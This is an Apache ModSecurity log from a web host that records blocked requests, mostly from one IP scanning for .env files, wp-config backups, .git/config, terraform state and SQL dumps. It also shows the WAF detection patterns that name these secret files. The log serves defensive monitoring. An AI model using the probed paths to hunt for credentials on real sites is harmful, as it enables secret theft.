[Tue May 26 14:17:01.273035 2026] [security2:error] [pid 598542:tid 598609] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/services/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JVywAAdEI"]
[Tue May 26 14:17:01.343757 2026] [security2:error] [pid 598542:tid 598639] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/shared/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JV0gAAL2A"]
[Tue May 26 14:17:01.378844 2026] [security2:error] [pid 598542:tid 598612] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/shop/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JV1gAAS0U"]
[Tue May 26 14:17:01.403956 2026] [security2:error] [pid 598542:tid 598774] [client 114.119.135.196:37913] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cpanel.ghanemgh.com"] [uri "/"] [unique_id "ahVeBf4iWyZxnXeAW3JV2AAAAGY"], referer: https://cpanel.ghanemgh.com/?locale=it
[Tue May 26 14:17:01.419053 2026] [security2:error] [pid 598542:tid 598665] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/src/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JV3QAAFHo"]
[Tue May 26 14:17:01.563317 2026] [security2:error] [pid 598542:tid 598587] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/srv/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JV7QAAICw"]
[Tue May 26 14:17:01.564192 2026] [security2:error] [pid 598542:tid 598632] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/stage/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JV7gAAIFk"]
[Tue May 26 14:17:01.565642 2026] [security2:error] [pid 598542:tid 598628] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/staging/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JV7wAAIFU"]
[Tue May 26 14:17:01.584284 2026] [security2:error] [pid 598542:tid 598657] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/stg/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JV9AAAa3I"]
[Tue May 26 14:17:01.677570 2026] [security2:error] [pid 598542:tid 598641] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/stripe/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JV_gAAGGI"]
[Tue May 26 14:17:01.728970 2026] [security2:error] [pid 598542:tid 598635] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahVeBf4iWyZxnXeAW3JWBQAAH1w"]
[Tue May 26 14:17:01.761124 2026] [security2:error] [pid 598542:tid 598634] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/test.php"] [unique_id "ahVeBf4iWyZxnXeAW3JWCQAAFls"]
[Tue May 26 14:17:01.794277 2026] [security2:error] [pid 598542:tid 598666] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/test/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JWCgAAQXs"]
[Tue May 26 14:17:01.823039 2026] [security2:error] [pid 598542:tid 598655] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/user/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JWDgAAAnA"]
[Tue May 26 14:17:01.863917 2026] [security2:error] [pid 598542:tid 598596] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/v2/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JWFAAAKjU"]
[Tue May 26 14:17:01.864406 2026] [security2:error] [pid 598542:tid 598636] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/v1/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JWEgAAKl0"]
[Tue May 26 14:17:01.873820 2026] [security2:error] [pid 598542:tid 598549] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/v3/.env"] [unique_id "ahVeBf4iWyZxnXeAW3JWGAAACAY"]
[Tue May 26 14:17:02.028693 2026] [security2:error] [pid 598542:tid 598569] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/var/www/.env"] [unique_id "ahVeBv4iWyZxnXeAW3JWLwAARRo"]
[Tue May 26 14:17:02.039946 2026] [security2:error] [pid 598542:tid 598586] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/var/www/html/.env"] [unique_id "ahVeBv4iWyZxnXeAW3JWMAAALSs"]
[Tue May 26 14:17:02.045577 2026] [security2:error] [pid 598542:tid 598575] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/web/.env"] [unique_id "ahVeBv4iWyZxnXeAW3JWMwAALSA"]
[Tue May 26 14:17:02.186217 2026] [security2:error] [pid 598542:tid 598555] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/website/.env"] [unique_id "ahVeBv4iWyZxnXeAW3JWQwAAcww"]
[Tue May 26 14:17:02.192121 2026] [security2:error] [pid 598542:tid 598669] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/wp-config.php"] [unique_id "ahVeBv4iWyZxnXeAW3JWRQAAYH4"]
[Tue May 26 14:17:02.195568 2026] [security2:error] [pid 598542:tid 598594] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.dimcorp.jhonweb.com"] [uri "/wp-config.php.bak"] [unique_id "ahVeBv4iWyZxnXeAW3JWRgAAYDM"]
[Tue May 26 14:17:02.212935 2026] [security2:error] [pid 598542:tid 598589] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.dimcorp.jhonweb.com"] [uri "/wp-config.php.new"] [unique_id "ahVeBv4iWyZxnXeAW3JWRwAAOi4"]
[Tue May 26 14:17:02.246500 2026] [security2:error] [pid 598542:tid 598592] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.dimcorp.jhonweb.com"] [uri "/wp-config.php.old"] [unique_id "ahVeBv4iWyZxnXeAW3JWSAAARzE"]
[Tue May 26 14:17:02.264091 2026] [security2:error] [pid 598542:tid 598580] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahVeBv4iWyZxnXeAW3JWSgAAMyU"]
[Tue May 26 14:17:02.343801 2026] [security2:error] [pid 598542:tid 598646] [remote 216.73.216.240:32968] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-products.php"] [unique_id "ahVeBv4iWyZxnXeAW3JWWAAAF2c"]
[Tue May 26 14:17:02.485615 2026] [security2:error] [pid 598542:tid 598757] [client 45.148.10.95:1312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/backend/.env"] [unique_id "ahVeBv4iWyZxnXeAW3JWYgAAAFU"]
[Tue May 26 14:17:02.539926 2026] [security2:error] [pid 598542:tid 598691] [client 45.148.10.95:1336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.dimcorp.jhonweb.com"] [uri "/*update.cgi*"] [unique_id "ahVeBv4iWyZxnXeAW3JWZAAAABM"]
[Tue May 26 14:17:02.569283 2026] [security2:error] [pid 598542:tid 598782] [client 45.148.10.95:1366] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env"] [unique_id "ahVeBv4iWyZxnXeAW3JWaAAAAG4"]
[Tue May 26 14:17:02.694834 2026] [security2:error] [pid 598542:tid 598788] [client 202.76.168.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeBv4iWyZxnXeAW3JWTgAAAHQ"]
[Tue May 26 14:17:02.712594 2026] [security2:error] [pid 598542:tid 598701] [client 45.148.10.95:1292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.docker/.env"] [unique_id "ahVeBv4iWyZxnXeAW3JWcAAAAB0"]
[Tue May 26 14:17:02.718058 2026] [security2:error] [pid 598542:tid 598703] [client 45.148.10.95:1302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVeBv4iWyZxnXeAW3JWcgAAAB8"]
[Tue May 26 14:17:02.786244 2026] [security2:error] [pid 598542:tid 598795] [client 45.148.10.95:1426] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env.backup"] [unique_id "ahVeBv4iWyZxnXeAW3JWeAAAAHs"]
[Tue May 26 14:17:02.867087 2026] [security2:error] [pid 598542:tid 598789] [client 45.148.10.95:1302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env"] [unique_id "ahVeBv4iWyZxnXeAW3JWfgAAAHU"]
[Tue May 26 14:17:02.955913 2026] [security2:error] [pid 598542:tid 598675] [client 45.148.10.95:1292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env.bak"] [unique_id "ahVeBv4iWyZxnXeAW3JWhgAAAAM"]
[Tue May 26 14:17:03.030269 2026] [security2:error] [pid 598542:tid 598730] [client 45.148.10.95:1476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env.php"] [unique_id "ahVeB_4iWyZxnXeAW3JWjQAAADo"]
[Tue May 26 14:17:03.086868 2026] [security2:error] [pid 598542:tid 598723] [client 45.148.10.95:1592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env.old"] [unique_id "ahVeB_4iWyZxnXeAW3JWkQAAADM"]
[Tue May 26 14:17:03.116523 2026] [security2:error] [pid 598542:tid 598686] [client 45.148.10.95:1540] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env.swp"] [unique_id "ahVeB_4iWyZxnXeAW3JWlAAAAA4"]
[Tue May 26 14:17:03.338668 2026] [security2:error] [pid 598542:tid 598793] [client 45.148.10.95:1592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env~"] [unique_id "ahVeB_4iWyZxnXeAW3JWoAAAAHk"]
[Tue May 26 14:17:03.446852 2026] [security2:error] [pid 598542:tid 598778] [client 45.148.10.95:1722] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.git/config~"] [unique_id "ahVeB_4iWyZxnXeAW3JWrgAAAGo"]
[Tue May 26 14:17:03.487067 2026] [security2:error] [pid 598542:tid 598745] [client 173.239.240.47:23331] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 47.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahVeB_4iWyZxnXeAW3JWnQAAAEk"]
[Tue May 26 14:17:03.538344 2026] [security2:error] [pid 598542:tid 598795] [client 45.148.10.95:1794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.git/config.bak"] [unique_id "ahVeB_4iWyZxnXeAW3JWtwAAAHs"]
